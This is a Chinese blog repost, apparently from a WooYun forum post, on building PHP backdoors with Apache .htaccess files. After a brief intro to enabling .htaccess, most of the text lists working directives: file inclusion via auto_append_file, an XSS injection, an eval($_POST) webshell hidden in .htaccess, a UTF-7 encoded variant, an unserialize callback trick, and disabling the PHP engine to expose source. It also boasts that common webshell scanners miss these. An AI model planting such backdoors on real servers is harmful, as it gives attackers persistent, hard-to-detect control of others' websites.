51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

记利用htaccess文件构成的PHP后门

0x00 .Htaccess简介

.htaccess 是Apache HTTP Server的文件目录系统级别的配置文件的默认的名字。它提供了在主配置文件中定义用户自定义指令的支持。 这些配置指令需要在 .htaccess 上下文 和用户需要的适当许可。

平时开发用的最多的就是URL重定向功能。

0x01 开启.htaccess

Apache中修改配置文件httpd.conf

1、修改如下内容

Options FollowSymLinks

AllowOverride None

为:

Options FollowSymLinks

AllowOverride All

2、开启rewrite模块

LoadModule rewrite_module modules/mod_rewrite.so

0x02 后门篇

1、 文件包含

.htaccess:php\_value auto\_append_file D:/wamp/www/1.txt*.php

2、 XSS后门

.htaccess:php_value highlight.comment '"><script>alert(1);</script>'*.php

3、 PHP后门

.htaccess:php\_value auto\_append\_file .htaccess#<?php eval($\_POST\[1\]);*.php.htaccess:php\_flag zend.multibyte 1php\_value zend.script\_encoding "UTF-7"php\_value auto\_append\_file .htaccess#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+Ads*.php.htaccess:php\_value unserialize\_callback_func "phpinfo"index.php:unserialize('O:1:"1":0:{}');

类似的回调函数都是可以的,过此处phpinfo要怎么调用才能运行任意代码还没研究出来。

4、 任意文件下载

.htaccess:php_flag engine 0*.php

0x03 webshell查杀

目前使用了D盾webshell查杀、SeayFindShell等工具对这个都没有查杀效果。不过也都是一些简单的一句话木马了,很容易被入库干掉。自己写了一个伪装成mysql调试文件的PHP木马,感觉好用多了。

原文

http://zone.wooyun.org/content/16114

赞(0)
未经允许不得转载:工具盒子 » 记利用htaccess文件构成的PHP后门